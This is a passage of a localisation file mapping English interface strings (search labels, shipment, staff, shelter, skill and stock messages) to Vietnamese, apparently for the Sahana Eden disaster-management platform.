'Search Commitments': 'Tìm kiếm cam kết', 'Search Committed People': 'Tìm kiếm người được cam kết', 
'Search Community Contacts': 'Tìm kiếm thông tin liên lạc của cộng đồng', 'Search Community': 'Tìm kiếm cộng đồng', 'Search Competency Ratings': 'Tìm kiếm đánh giá năng lực', 'Search Contact Information': 'Tìm kiếm thông tin liên hệ', 'Search Contacts': 'Tìm kiếm liên lạc', 'Search Course Certificates': 'Tìm kiếm chứng chỉ đào tạo', 'Search Courses': 'Tìm kiếm khóa đào tạo', 'Search Credentials': 'Tìm kiếm giấy chứng nhận', 'Search Demographic Data': 'Tìm kiếm dữ liệu nhân khẩu học', 'Search Demographic Sources': 'Tìm kiếm nguồn dữ liệu dân số', 'Search Demographics': 'Tìm kiếm số liệu thống kê dân số', 'Search Departments': 'Tìm kiếm phòng/ban', 'Search Distributions': 'Tìm kiếm Quyên góp', 'Search Documents': 'Tìm kiếm tài liệu', 'Search Donors': 'Tìm kiếm nhà tài trợ', 'Search Education Details': 'Tìm kiếm thông tin đào tạo', 'Search Email InBox': 'Tìm kiếm thư trong hộp thư đến', 'Search Entries': 'Tìm kiếm hồ sơ', 'Search Facilities': 'Tìm kiếm trang thiết bị', 'Search Facility Types': 'Tìm kiếm loại hình bộ phận', 'Search Feature Layers': 'Tìm kiếm lớp tính năng', 'Search Flood Reports': 'Tìm các báo cáo về lũ lụt', 'Search Frameworks': 'Tìm kiếm khung chương trình', 'Search Groups': 'Tìm kiếm nhóm', 'Search Hospitals': 'Tìm kiếm các bệnh viện', 'Search Hours': 'Tìm kiếm theo thời gian hoạt động', 'Search Identity': 'Tìm kiếm nhận dạng', 'Search Images': 'Tìm kiếm hình ảnh', 'Search Incident Reports': 'Tìm kiếm báo cáo sự việc', 'Search Item Catalog(s)': 'Tìm kiếm Catalog hàng hóa', 'Search Item Categories': 'Tìm kiếm nhóm mặt hàng', 'Search Item Packs': 'Tìm kiếm gói hàng', 'Search Items in Request': 'Tìm kiếm mặt hàng đang đề nghị', 'Search Items': 'Tìm kiếm mặt hàng', 'Search Job Roles': 'Tìm kiếm vai trò của công việc', 'Search Job Titles': 'Tìm kiếm chức danh công việc', 'Search Keys': 'Tìm kiếm mã', 'Search Kits': 'Tìm kiếm bộ dụng cụ', 'Search Layers': 'Tìm kiếm lớp', 'Search Location Hierarchies': 'Tìm kiếm thứ tự địa điểm', 'Search Location': 'Tìm kiếm địa điểm', 'Search Locations': 'Tìm kiếm địa điểm', 'Search Log Entry': 'Tìm kiếm ghi chép nhật ký', 'Search Logged Time': 'Tìm kiếm thời gian đăng nhập', 'Search Mailing Lists': 'Tìm kiếm danh sách gửi thư', 'Search Map Profiles': 'Tìm kiếm cấu hình bản đồ', 'Search Markers': 'Tìm kiếm đánh dấu', 'Search Members': 'Tìm kiếm thành viên', 'Search Membership Types': 'Tìm kiếm loại hình hội viên', 'Search Membership': 'Tìm kiếm hội viên', 'Search Memberships': 'Tìm kiếm thành viên', 'Search Metadata': 'Tìm kiếm siêu dữ liệu', 'Search Milestones': 'Tìm kiếm mốc quan trọng', 'Search Office Types': 'Tìm kiếm loại hình văn phòng', 'Search Offices': 'Tìm kiếm văn phòng', 'Search Open Tasks for %(project)s': 'Tìm kiếm Công việc Chưa được xác định cho %(project)s', 'Search Orders': 'Tìm kiếm đơn hàng', 'Search Organization Domains': 'Tìm kiếm lĩnh vực hoạt động của tổ chức', 'Search Organization Types': 'Tìm kiếm loại hình tổ chức', 'Search Organizations': 'Tìm kiếm tổ chức', 'Search Participants': 'Tìm kiếm người tham dự', 'Search Partner Organizations': 'Tìm kiếm tổ chức thành viên', 'Search Persons': 'Tìm kiếm người', 'Search Photos': 'Tìm kiếm hình ảnh', 'Search Professional Experience': 'Tìm kiếm kinh nghiệm nghề nghiệp', 'Search Programs': 'Tìm kiếm chương trình', 'Search Project Organizations': 'Tìm kiếm tổ chức dự án', 'Search Projections': 'Tìm kiếm dự đoán', 'Search Projects': 'Tìm kiếm dự án', 'Search Received/Incoming Shipments': 'Tìm kiếm lô hàng đến/nhận', 'Search Records': 'Tìm kiếm hồ sơ', 'Search Red Cross & Red Crescent 
National Societies': 'Tìm kiếm Hội Chữ thập đỏ và Trăng lưỡi liềm đỏ Quốc gia', 'Search Registations': 'Tìm kiếm các đăng ký', 'Search Registration Request': 'Tìm kiếm Yêu cầu Đăng ký', 'Search Report': 'Tìm kiếm báo cáo', 'Search Reports': 'Tìm kiếm Báo cáo', 'Search Request Items': 'Tìm kiếm Yêu cầu hàng hóa', 'Search Request': 'Tìm kiếm yêu cầu', 'Search Requested Skills': 'Tìm kiếm kỹ năng được đề nghị', 'Search Requests': 'Tìm kiếm đề nghị', 'Search Resources': 'Tìm kiếm các nguồn lực', 'Search Results': 'Tìm kiếm kết quả', 'Search Roles': 'Tìm kiếm vai trò', 'Search Rooms': 'Tìm kiếm phòng', 'Search Sectors': 'Tìm kiếm lĩnh vực', 'Search Sent Shipments': 'Tìm kiếm lô hàng đã gửi', 'Search Shelter Services': 'Tìm kiếm dịch vụ cư trú', 'Search Shelter Types': 'Tìm kiếm Loại Cư trú', 'Search Shipment Items': 'Tìm kiếm mặt hàng của lô hàng', 'Search Shipment/Way Bills': 'Tìm kiếm đơn hàng/hóa đơn vận chuyển', 'Search Shipped Items': 'Tìm kiếm mặt hàng được chuyển', 'Search Skill Equivalences': 'Tìm kiếm kỹ năng tương ứng', 'Search Skill Types': 'Tìm kiếm nhóm kỹ năng', 'Search Skills': 'Tìm kiếm kỹ năng', 'Search Staff & Volunteers': 'Tìm kiếm nhân viên & tình nguyện viên', 'Search Staff Assignments': 'Tìm kiếm công việc của nhân viên', 'Search Staff': 'Tìm kiếm nhân viên', 'Search Stock Adjustments': 'Tìm kiếm điều chỉnh về kho hàng', 'Search Stock Items': 'Tìm kiếm mặt hàng trong kho', 'Search Storage Location(s)': 'Tìm kiếm kho lưu trữ', 'Search Subscriptions': 'Tìm kiếm danh sách, số tiền quyên góp', 'Search Suppliers': 'Tìm kiếm nhà cung cấp', 'Search Support Requests': 'Tìm kiếm yêu cầu được hỗ trợ', 'Search Symbologies': 'Tìm kiếm biểu tượng', 'Search Tasks': 'Tìm kiếm nhiệm vụ', 'Search Teams': 'Tìm kiếm Đội/Nhóm', 'Search Theme Data': 'Tìm kiếm dữ liệu chủ đề', 'Search Themes': 'Tìm kiếm chủ đề', 'Search Tracks': 'Tìm kiếm dấu vết', 'Search Training Events': 'Tìm kiếm khóa tập huấn', 'Search Training Participants': 'Tìm kiếm học viên', 'Search Twilio SMS Inbox': 'Tìm kiếm hộp thư đến SMS Twilio', 'Search Twitter Tags': 'Tìm kiếm liên kết với Twitter', 'Search Units': 'Tìm kiếm đơn vị', 'Search Users': 'Tìm kiếm người sử dụng', 'Search Vehicle Assignments': 'Tìm kiếm việc điều động phương tiện', 'Search Volunteer Cluster Positions': 'Tìm kiếm vị trí của nhóm tình nguyện viên', 'Search Volunteer Cluster Types': 'Tìm kiếm loại hình nhóm tình nguyện viên', 'Search Volunteer Clusters': 'Tìm kiếm nhóm tình nguyện viên', 'Search Volunteer Registrations': 'Tìm kiếm Đăng ký tình nguyện viên', 'Search Volunteer Roles': 'Tìm kiếm vai trò của tình nguyện viên', 'Search Volunteers': 'Tìm kiếm tình nguyện viên', 'Search Vulnerability Aggregated Indicators': 'Tìm kiếm chỉ số theo tình trạng dễ bị tổn thương', 'Search Vulnerability Data': 'Tìm kiếm dữ liệu về tình trạng dễ bị tổn thương', 'Search Vulnerability Indicator Sources': 'Tìm kiếm nguồn chỉ số về tình trạng dễ bị tổn thương', 'Search Vulnerability Indicators': 'Tìm kiếm chỉ số về tình trạng dễ bị tổn thương', 'Search Warehouse Stock': 'Tìm kiếm Hàng trữ trong kho', 'Search Warehouses': 'Tìm kiếm Nhà kho', 'Search and Edit Group': 'Tìm và sửa thông tin nhóm', 'Search and Edit Individual': 'Tìm kiếm và chỉnh sửa cá nhân', 'Search for Activity Type': 'Tìm kiếm nhóm hoạt động', 'Search for Job': 'Tìm kiếm công việc', 'Search for Repository': 'Tìm kiếm Nơi lưu trữ', 'Search for Resource': 'Tìm kiếm nguồn lực', 'Search for a Hospital': 'Tìm kiếm bệnh viện', 'Search for a Location': 'Tìm một địa điểm', 'Search for a Person': 'Tìm kiếm theo 
tên', 'Search for a Project Community by name.': 'Tìm kiếm cộng đồng dự án theo tên.', 'Search for a Project by name, code, location, or description.': 'Tìm kiếm dự án theo tên, mã, địa điểm, hoặc mô tả.', 'Search for a Project by name, code, or description.': 'Tìm kiếm dự án theo tên, mã, hoặc mô tả.', 'Search for a Project': 'Tìm kiếm dự án', 'Search for a Request': 'Tìm kiếm một yêu cầu', 'Search for a Task by description.': 'Tìm kiếm nhiệm vụ theo mô tả.', 'Search for a shipment by looking for text in any field.': 'Tìm kiếm lô hàng bằng cách nhập từ khóa vào các ô.', 'Search for a shipment received between these dates': 'Tìm kiếm lô hàng đã nhận trong khoảng giữa những ngày này', 'Search for an Organization by name or acronym': 'Tìm kiếm tổ chức theo tên hoặc chữ viết tắt', 'Search for an item by Year of Manufacture.': 'Tìm kiếm mặt hàng theo năm sản xuất.', 'Search for an item by brand.': 'Tìm kiếm mặt hàng theo nhãn hàng.', 'Search for an item by catalog.': 'Tìm kiếm mặt hàng theo danh mục.', 'Search for an item by category.': 'Tìm kiếm mặt hàng theo nhóm.', 'Search for an item by its code, name, model and/or comment.': 'Tìm kiếm mặt hàng theo mã, tên, kiểu và/hoặc nhận xét.', 'Search for an item by text.': 'Tìm kiếm mặt hàng theo từ khóa.', 'Search for an order by looking for text in any field.': 'Tìm kiếm đơn đặt hàng bằng cách nhập từ khóa vào các ô.', 'Search for an order expected between these dates': 'Tìm kiếm một đơn hàng dự kiến trong khoảng giữa những ngày này', 'Search for office by organization.': 'Tìm kiếm văn phòng theo tổ chức.', 'Search for office by text.': 'Tìm kiếm văn phòng theo từ khóa.', 'Search for warehouse by organization.': 'Tìm kiếm nhà kho theo tổ chức.', 'Search for warehouse by text.': 'Tìm kiếm nhà kho theo từ khóa.', 'Search location in Geonames': 'Tìm kiếm địa điểm trong GeoNames', 'Search messages': 'Tìm kiếm tin nhắn', 'Search saved searches': 'Tìm trong các tìm kiếm đã lưu', 'Search': 'Tìm kiếm', 'Secondary Server (Optional)': 'Máy chủ thứ cấp (Tùy chọn)', 'Seconds must be a number between 0 and 60': 'Giây phải là số từ 0 đến 60', 'Seconds must be a number.': 'Giây phải bằng số', 'Seconds must be less than 60.': 'Giây phải nhỏ hơn 60', 'Section Details': 'Chi tiết Mục', 'Section': 'Mục', 'Sections that are part of this template': 'Các Mục thuộc biểu mẫu này', 'Sector Details': 'Chi tiết lĩnh vực', 'Sector added': 'Thêm Lĩnh vực', 'Sector deleted': 'Xóa Lĩnh vực', 'Sector updated': 'Cập nhật Lĩnh vực', 'Sector': 'Lĩnh vực', 'Sector(s)': 'Lĩnh vực', 'Sectors to which this Theme can apply': 'Lựa chọn Lĩnh vực phù hợp với Chủ đề này', 'Sectors': 'Lĩnh vực', 'Security Policy': 'Chính sách bảo mật', 'Security Required': 'An ninh được yêu cầu', 'Security Staff Types': 'Loại cán bộ bảo vệ', 'See All Entries': 'Xem tất cả hồ sơ', 'See a detailed description of the module on the Sahana Eden wiki': 'Xem chi tiết mô tả Modun trên Sahana Eden wiki', 'See the universally unique identifier (UUID) of this repository': 'Xem Định dạng duy nhất toàn cầu (UUID) của thư mục lưu này', 'Seen': 'Đã xem', 'Select %(location)s': 'Chọn %(location)s', 'Select %(up_to_3_locations)s to compare overall resilience': 'Chọn %(up_to_3_locations)s để so sánh tổng thể Sự phục hồi nhanh', 'Select Existing Location': 'Lựa chọn vị trí đang có', 'Select Items from the Request': 'Chọn Hàng hóa từ Yêu cầu', 'Select Label Question': 'Chọn nhãn câu hỏi', 'Select Modules for translation': 'Lựa chọn các Module để dịch', 'Select Modules which are to be translated': 'Chọn Modun cần dịch', 'Select Numeric 
Questions (one or more):': 'Chọn câu hỏi về lượng (một hay nhiều hơn)', 'Select Stock from this Warehouse': 'Chọn hàng hóa lưu kho từ một Kho hàng', 'Select This Location': 'Lựa chọn vị trí này', 'Select a Country': 'Chọn nước', 'Select a commune to': 'Chọn xã đến', 'Select a label question and at least one numeric question to display the chart.': 'Chọn nhãn câu hỏi và ít nhất 1 câu hỏi về lượng để thể hiện biểu đồ', 'Select a location': 'Lựa chọn một địa điểm', 'Select a question from the list': 'Chọn một câu hỏi trong danh sách', 'Select all modules': 'Chọn mọi Modun', 'Select all that apply': 'Chọn tất cả các áp dụng trên', 'Select an Organization to see a list of offices': 'Chọn một Tổ chức để xem danh sách văn phòng', 'Select an existing bin': 'Lựa chọn ngăn có sẵn', 'Select an office': 'Chọn một văn phòng', 'Select any one option that apply': 'Lựa chọn bất cứ một lựa chọn được áp dụng', 'Select data type': 'Chọn loại dữ liệu', 'Select from registry': 'Chọn từ danh sách đã đăng ký', 'Select language code': 'Chọn mã ngôn ngữ', 'Select one or more option(s) that apply': 'Lựa một hoặc nhiều lựa chọn được áp dụng', 'Select the default site.': 'Lựa chọn địa điểm mặc định', 'Select the language file': 'Chọn tệp ngôn ngữ', 'Select the overlays for Assessments and Activities relating to each Need to identify the gap.': 'Lựa chọn lớp dữ liệu phủ cho Đánh giá và Hoạt động liên quan đến mỗi nhu cầu để xác định khoảng thiếu hụt.', 'Select the person assigned to this role for this project.': 'Chọn người được bổ nhiệm cho vai trò này trong dự án', 'Select the required modules': 'Chọn Modun cần thiết', 'Select': 'Chọn', 'Selected Questions for all Completed Assessment Forms': 'Câu hỏi được chọn cho tất cả các mẫu Đánh giá đã hoàn thành', 'Selects what type of gateway to use for outbound SMS': 'Chọn loại cổng để sử dụng tin nhắn gửi ra', 'Send Alerts using Email &/or SMS': 'Gửi Cảnh báo sử dụng thư điện tử &/hay SMS', 'Send Commitment': 'Gửi Cam kết', 'Send Dispatch Update': 'Gửi cập nhật điều phối', 'Send Message': 'Gửi tin', 'Send New Shipment': 'Gửi Lô hàng Mới', 'Send Notification': 'Gửi thông báo', 'Send Shipment': 'Gửi Lô hàng', 'Send Task Notification': 'Gửi Thông báo Nhiệm vụ', 'Send a message to this person': 'Gửi tin nhắn cho người này', 'Send a message to this team': 'Gửi tin nhắn cho đội này', 'Send batch': 'Gửi hàng loạt', 'Send from %s': 'Gửi từ %s', 'Send message': 'Gửi tin nhắn', 'Send new message': 'Gửi tin nhắn mới', 'Send': 'Gửi', 'Sender': 'Người gửi', 'Senders': 'Người gửi', 'Senior (50+)': 'Người già (50+)', 'Senior Officer': 'Chuyên viên cao cấp', 'Sensitivity': 'Mức độ nhạy cảm', 'Sent By Person': 'Được gửi bởi Ai', 'Sent By': 'Được gửi bởi', 'Sent Shipment Details': 'Chi tiết lô hàng đã gửi', 'Sent Shipment canceled and items returned to Warehouse': 'Hủy lô hàng đã gửi và trả lại hàng hóa về kho Hàng', 'Sent Shipment canceled': 'Hủy lô hàng đã gửi', 'Sent Shipment has returned, indicate how many items will be returned to Warehouse.': 'Lô hàng được gửi đã được trả lại, nêu rõ bao nhiêu mặt hàng sẽ được trả lại kho hàng', 'Sent Shipment updated': 'Cập nhật Lô hàng đã gửi', 'Sent Shipments': 'Hàng chuyển', 'Sent date': 'Thời điểm gửi', 'Sent': 'đã được gửi', 'Separated': 'Ly thân', 'Serial Number': 'Số se ri', 'Series details missing': 'Thiếu chi tiết Se ri', 'Series': 'Se ri', 'Server': 'Máy chủ', 'Service Record': 'Hồ sơ hoạt động', 'Service or Facility': 'Dịch vụ hay Bộ phận', 'Service profile added': 'Đã thêm thông tin dịch vụ', 'Services Available': 'Các dịch vụ đang triển khai', 
'Services': 'Dịch vụ', 'Set Base Facility/Site': 'Thiết lập Bộ phận/Địa bàn cơ bản', 'Set By': 'Thiết lập bởi', 'Set True to allow editing this level of the location hierarchy by users who are not MapAdmins.': 'Thiết lập Đúng để cho phép chỉnh sửa mức này của hệ thống hành chính địa điểm bởi người sử dụng không thuộc quản trị bản đồ', 'Setting Details': 'Chi tiết cài đặt', 'Setting added': 'Thêm cài đặt', 'Setting deleted': 'Xóa cài đặt', 'Settings were reset because authenticating with Twitter failed': 'Cài đặt được làm lại vì sự xác minh với Twitter bị lỗi', 'Settings which can be configured through the web interface are available here.': 'Cài đặt có thể được cấu hình thông qua tương tác với trang web có thể làm ở đây.', 'Settings': 'Các Cài đặt', 'Sex (Count)': 'Giới tính (Số lượng)', 'Sex': 'Giới tính', 'Sexual and Reproductive Health': 'Sức khỏe sinh sản và Sức khỏe tình dục', 'Share a common Marker (unless over-ridden at the Feature level)': 'Chia sẻ Đèn hiệu chung (nếu không vượt mức tính năng)', 'Shelter Registry': 'Đăng ký tạm trú', 'Shelter Repair Kit': 'Bộ dụng cụ sửa nhà', 'Shelter Service Details': 'Chi tiết dịch vụ cư trú', 'Shelter Services': 'Dịch vụ cư trú', 'Shelter added': 'Đã thêm Thông tin cư trú', 'Shelter deleted': 'Đã xóa nơi cư trú', 'Shelter': 'Nhà', 'Shelters': 'Địa điểm cư trú', 'Shipment Created': 'Tạo Lô hàng', 'Shipment Item Details': 'Chi tiết hàng hóa trong lô hàng', 'Shipment Item deleted': 'Xóa hàng hóa trong lô hàng', 'Shipment Item updated': 'Cập nhật hàng hóa trong lô hàng', 'Shipment Items Received': 'Hàng hóa trong lô hàng đã nhận được', 'Shipment Items sent from Warehouse': 'Hàng hóa trong lô hàng được gửi từ Kho hàng', 'Shipment Items': 'Hàng hóa trong lô hàng', 'Shipment Type': 'Loại Lô hàng', 'Shipment received': 'Lô hàng đã nhận được', 'Shipment to Receive': 'Lô hàng sẽ nhận được', 'Shipment to Send': 'Lô hàng sẽ gửi', 'Shipment': 'Lô hàng', 'Shipment/Way Bills': 'Đơn hàng/Hóa đơn vận chuyển', 'Shipment<>Item Relation added': 'Đã thêm đơn hàng <>hàng hóa liên quan', 'Shipment<>Item Relation deleted': 'Đã xóa đơn hàng <>Hàng hóa liên quan', 'Shipment<>Item Relation updated': 'Đã cập nhật Đơn hàng<>hàng hóa liên quan', 'Shipment<>Item Relations Details': 'Đơn hàng<>Chi tiết hàng hóa liên quan', 'Shipments': 'Các loại lô hàng', 'Shipping Organization': 'Tổ chức hàng hải', 'Shooting': 'Bắn', 'Short Description': 'Miêu tả ngắn gọn', 'Short Text': 'Đoạn văn bản ngắn', 'Short Title / ID': 'Tên viết tắt/ Mã dự án', 'Short-term': 'Ngắn hạn', 'Show Details': 'Hiển thị chi tiết', 'Show %(number)s entries': 'Hiển thị %(number)s hồ sơ', 'Show less': 'Thể hiện ít hơn', 'Show more': 'Thể hiện nhiều hơn', 'Show on Map': 'Thể hiện trên bản đồ', 'Show on map': 'Hiển thị trên bản đồ', 'Show totals': 'Hiển thị tổng', 'Show': 'Hiển thị', 'Showing 0 to 0 of 0 entries': 'Hiển thị 0 tới 0 của 0 hồ sơ', 'Showing _START_ to _END_ of _TOTAL_ entries': 'Hiển thị _START_ tới _END_ của _TOTAL_ hồ sơ', 'Showing latest entries first': 'Hiển thị hồ sơ mới nhất trước', 'Signature / Stamp': 'Chữ ký/dấu', 'Signature': 'Chữ ký', 'Simple Search': 'Tìm kiếm cơ bản', 'Single PDF File': 'File PDF', 'Single': 'Độc thân', 'Site Address': 'Địa chỉ địa điểm', 'Site Administration': 'Quản trị Site', 'Site Manager': 'Người quản lý địa điểm', 'Site Name': 'Tên địa điểm', 'Site updated': 'Đã cập nhật site', 'Site': 'Địa điểm', 'Sitemap': 'Sơ đồ trang', 'Sites': 'Các địa điểm', 'Situation Awareness & Geospatial Analysis': 'Nhận biết tình huống và phân tích tọa độ địa lý', 'Situation': 'Tình hình', 
'Skeleton Example': 'Ví dụ khung', 'Sketch': 'Phác thảo', 'Skill Catalog': 'Danh mục kỹ năng', 'Skill Details': 'Chi tiết kỹ năng', 'Skill Equivalence Details': 'Chi tiết Kỹ năng tương ứng', 'Skill Equivalence added': 'Thêm Kỹ năng tương ứng', 'Skill Equivalence deleted': 'Xóa Kỹ năng tương ứng', 'Skill Equivalence updated': 'Cập nhật Kỹ năng tương ứng', 'Skill Equivalence': 'Kỹ năng tương ứng', 'Skill Equivalences': 'Các Kỹ năng tương ứng', 'Skill Type Catalog': 'Danh mục Loại Kỹ năng', 'Skill Type added': 'Thêm Loại Kỹ năng', 'Skill Type deleted': 'Xóa Loại Kỹ năng', 'Skill Type updated': 'Cập nhật Loại Kỹ năng', 'Skill Type': 'Loại Kỹ năng', 'Skill added to Request': 'Thêm Kỹ năng vào Yêu cầu', 'Skill added': 'Thêm Kỹ năng', 'Skill deleted': 'Xóa kỹ năng', 'Skill removed from Request': 'Bỏ kỹ năng khỏi yêu cầu', 'Skill removed': 'Bỏ kỹ năng', 'Skill updated': 'Cập nhật kỹ năng', 'Skill': 'Kỹ năng', 'Skills': 'Kỹ năng', 'Smoke': 'Khói', 'Snapshot': 'Chụp ảnh', 'Snow Fall': 'Tuyết rơi', 'Snow Squall': 'Mưa tuyết kèm gió giật', 'Social Impact & Resilience': 'Khả năng phục hồi và Tác động xã hội', 'Social Inclusion & Diversity': 'Đa dạng hóa/ Tăng cường hòa nhập xã hội', 'Social Insurance Number': 'Số sổ BHXH', 'Social Insurance': 'Bảo hiểm xã hội', 'Social Mobilization': 'Huy động xã hội', 'Solid Waste Management': 'Quản lý chất thải rắn', 'Solution added': 'Đã thêm giải pháp', 'Solution deleted': 'Đã xóa giải pháp', 'Solution updated': 'Đã cập nhật giải pháp', 'Sorry - the server has a problem, please try again later.': 'Xin lỗi - Máy chủ có sự cố, vui lòng thử lại sau.', 'Sorry location %(location)s appears to be outside the area of parent %(parent)s.': 'Xin lỗi địa điểm %(location)s có vẻ như ngoài vùng của lớp trên %(parent)s', 'Sorry location %(location)s appears to be outside the area supported by this deployment.': 'Xin lỗi địa điểm %(location)s có vẻ như ngoài vùng hỗ trợ bởi đợt triển khai này', 'Sorry location appears to be outside the area of parent %(parent)s.': 'Xin lỗi địa điểm có vẻ như ngoài vùng của lớp trên %(parent)s', 'Sorry location appears to be outside the area supported by this deployment.': 'Xin lỗi địa điểm có vẻ như ngoài vùng hỗ trợ bởi đợt triển khai này', 'Sorry, I could not understand your request': 'Xin lỗi, tôi không thể hiểu yêu cầu của bạn', 'Sorry, only users with the MapAdmin role are allowed to edit these locations': 'Xin lỗi, chỉ người sử dụng có chức năng quản trị bản đồ được phép chỉnh sửa các địa điểm này', 'Sorry, something went wrong.': 'Xin lỗi, có sự cố.', 'Sorry, that page is forbidden for some reason.': 'Xin lỗi, vì một số lý do trang đó bị cấm.', 'Sorry, that service is temporary unavailable.': 'Xin lỗi, dịch vụ đó tạm thời không có', 'Sorry, there are no addresses to display': 'Xin lỗi, Không có địa chỉ để hiển thị', 'Source Type': 'Loại nguồn', 'Source not specified!': 'Nguồn không xác định!', 'Source': 'Nguồn', 'Space Debris': 'Rác vũ trụ', 'Spanish': 'Tiếng Tây Ban Nha', 'Special Ice': 'Băng tuyết đặc biệt', 'Special Marine': 'Hàng hải đặc biệt', 'Special needs': 'Nhu cầu đặc biệt', 'Specialized Hospital': 'Bệnh viện chuyên khoa', 'Specific Area (e.g. 
Building/Room) within the Location that this Person/Group is seen.': 'Khu vực cụ thể (ví dụ Tòa nhà/Phòng) trong khu vực mà người/Nhóm được nhìn thấy', 'Specific locations need to have a parent of level': 'Các địa điểm cụ thể cần có lớp trên', 'Specify a descriptive title for the image.': 'Chỉ định một tiêu đề mô tả cho ảnh', 'Spherical Mercator (900913) is needed to use OpenStreetMap/Google/Bing base layers.': 'Spherical Mercator (900913) cần thiết để sử dụng OpenStreetMap/Google/Bing như là lớp bản đồ cơ sở.', 'Spreadsheet': 'Bảng tính', 'Squall': 'Gió giật', 'Staff & Volunteers (Combined)': 'Cán bộ & TNV', 'Staff & Volunteers': 'Cán bộ & Tình nguyện viên', 'Staff Assigned': 'Cán bộ được bổ nhiệm', 'Staff Assignment Details': 'Chi tiết bổ nhiệm cán bộ', 'Staff Assignment removed': 'Bỏ bổ nhiệm cán bộ', 'Staff Assignment updated': 'Cập nhật bổ nhiệm cán bộ', 'Staff Assignments': 'Các bổ nhiệm cán bộ', 'Staff ID': 'Định danh cán bộ', 'Staff Level': 'Ngạch công chức', 'Staff Management': 'Quản lý cán bộ', 'Staff Member Details updated': 'Cập nhật chi tiết cán bộ', 'Staff Member Details': 'Chi tiết cán bộ', 'Staff Member deleted': 'Xóa Cán bộ', 'Staff Record': 'Hồ sơ cán bộ', 'Staff Report': 'Cán bộ', 'Staff Type Details': 'Chi tiết bộ phận nhân viên', 'Staff deleted': 'Xóa tên nhân viên', 'Staff member added': 'Thêm cán bộ', 'Staff with Contracts Expiring in the next Month': 'Cán bộ hết hạn hợp đồng tháng tới', 'Staff': 'Cán bộ', 'Staff/Volunteer Record': 'Hồ sơ Cán bộ/Tình nguyện viên', 'Staff/Volunteer': 'Cán bộ/Tình nguyện viên', 'Start Date': 'Ngày bắt đầu', 'Start date': 'Ngày bắt đầu', 'Start of Period': 'Khởi đầu chu kỳ', 'Start': 'Bắt đầu', 'State / Province (Count)': 'Tỉnh / Thành phố (Số lượng)', 'State / Province': 'Tỉnh', 'Station Parameters': 'Thông số trạm', 'Statistics Parameter': 'Chỉ số thống kê', 'Statistics': 'Thống kê', 'Stats Group': 'Nhóm thống kê', 'Status Details': 'Chi tiết Tình trạng', 'Status Report': 'Báo cáo tình trạng ', 'Status Updated': 'Cập nhật Tình trạng', 'Status added': 'Thêm Tình trạng', 'Status deleted': 'Xóa Tình trạng', 'Status of adjustment': 'Tình trạng điều chỉnh', 'Status of operations of the emergency department of this hospital.': 'Tình trạng hoạt động của phòng cấp cứu tại bệnh viện này', 'Status of security procedures/access restrictions in the hospital.': 'Trạng thái của các giới hạn thủ tục/truy nhập an ninh trong bệnh viện', 'Status of the operating rooms of this hospital.': 'Trạng thái các phòng mổ trong bệnh viện này', 'Status updated': 'Cập nhật Tình trạng', 'Status': 'Tình trạng', 'Statuses': 'Các tình trạng', 'Stock Adjustment Details': 'Chi tiết điều chỉnh hàng lưu kho', 'Stock Adjustments': 'Điều chỉnh Hàng lưu kho', 'Stock Expires %(date)s': 'Hàng lưu kho hết hạn %(date)s', 'Stock added to Warehouse': 'Hàng hóa lưu kho được thêm vào Kho hàng', 'Stock in Warehouse': 'Hàng lưu kho', 'Stock removed from Warehouse': 'Hàng lưu kho được lấy ra khỏi Kho hàng', 'Stock': 'Hàng lưu kho', 'Stockpiling, Prepositioning of Supplies': 'Dự trữ hàng hóa', 'Stocks and relief items.': 'Kho hàng và hàng cứu trợ.', 'Stolen': 'Bị mất cắp', 'Store spreadsheets in the Eden database': 'Lưu trữ bảng tính trên cơ sở dữ liệu của Eden', 'Storm Force Wind': 'Sức mạnh Gió bão', 'Storm Surge': 'Bão biển gây nước dâng', 'Stowaway': 'Đi tàu lậu', 'Strategy': 'Chiến lược', 'Street Address': 'Địa chỉ', 'Street View': 'Xem kiểu đường phố', 'Strengthening Livelihoods': 'Cải thiện nguồn sinh kế', 'Strong Wind': 'Gió bão', 'Strong': 'Mạnh', 'Structural Safety': 'An toàn kết 
cấu trong xây dựng', 'Style Field': 'Kiểu trường', 'Style Values': 'Kiểu giá trị', 'Style': 'Kiểu', 'Subject': 'Tiêu đề', 'Submission successful - please wait': 'Gửi thành công - vui lòng đợi', 'Submit Data': 'Gửi dữ liệu', 'Submit New (full form)': 'Gửi mới (mẫu đầy đủ)', 'Submit New (triage)': 'Gửi mới (phân loại ưu tiên)', 'Submit New': 'Gửi mới', 'Submit all': 'Gửi tất cả', 'Submit data to the region': 'Gửi dữ liệu cho vùng', 'Submit more': 'Gửi thêm', 'Submit online': 'Gửi qua mạng', 'Submit': 'Gửi', 'Submitted by': 'Được gửi bởi', 'Subscription deleted': 'Đã xóa đăng ký', 'Subscriptions': 'Đăng ký', 'Subsistence Cost': 'Mức sống tối thiểu', 'Successfully registered at the repository.': 'Đã đăng ký thành công vào hệ thống', 'Suggest not changing this field unless you know what you are doing.': 'Khuyến nghị bạn không thay đổi trường này khi chưa chắc chắn', 'Sum': 'Tổng', 'Summary Details': 'Thông tin tổng hợp', 'Summary by Question Type - (The fewer text questions the better the analysis can be)': 'Tổng hợp theo loại câu hỏi - (Phân tích dễ dàng hơn nếu có ít câu hỏi bằng chữ)', 'Summary of Completed Assessment Forms': 'Tổng hợp biểu mẫu đánh giá đã hoàn thành', 'Summary of Incoming Supplies': 'Tổng hợp mặt hàng đang đến', 'Summary of Releases': 'Tổng hợp bản tin báo chí', 'Summary': 'Tổng hợp', 'Supplier Details': 'Thông tin nhà cung cấp', 'Supplier added': 'Nhà cung cấp đã được thêm', 'Supplier deleted': 'Nhà cung cấp đã được xóa', 'Supplier updated': 'Nhà cung cấp đã được cập nhật', 'Supplier': 'Nhà cung cấp', 'Supplier/Donor': 'Nhà cung cấp/Nhà tài trợ', 'Suppliers': 'Nhà cung cấp', 'Supply Chain Management': 'Quản lý dây chuyền cung cấp', 'Support Request': 'Yêu cầu hỗ trợ', 'Support Requests': 'Yêu cầu hỗ trợ', 'Support': 'Trợ giúp', 'Surplus': 'Thặng dư', 'Survey Answer Details': 'Chi tiết trả lời câu hỏi khảo sát', 'Survey Answer added': 'Đã thêm trả lời khảo sát', 'Survey Name': 'Tên khảo sát', 'Survey Question Display Name': 'Tên trên bảng câu hỏi khảo sát', 'Survey Question updated': 'Cập nhật câu hỏi khảo sát', 'Survey Section added': 'Đã thêm khu vực khảo sát', 'Survey Section updated': 'Cập nhật khu vực khảo sát', 'Survey Series added': 'Đã thêm chuỗi khảo sát', 'Survey Series deleted': 'Đã xóa chuỗi khảo sát', 'Survey Series updated': 'Đã cập nhật chuỗi khảo 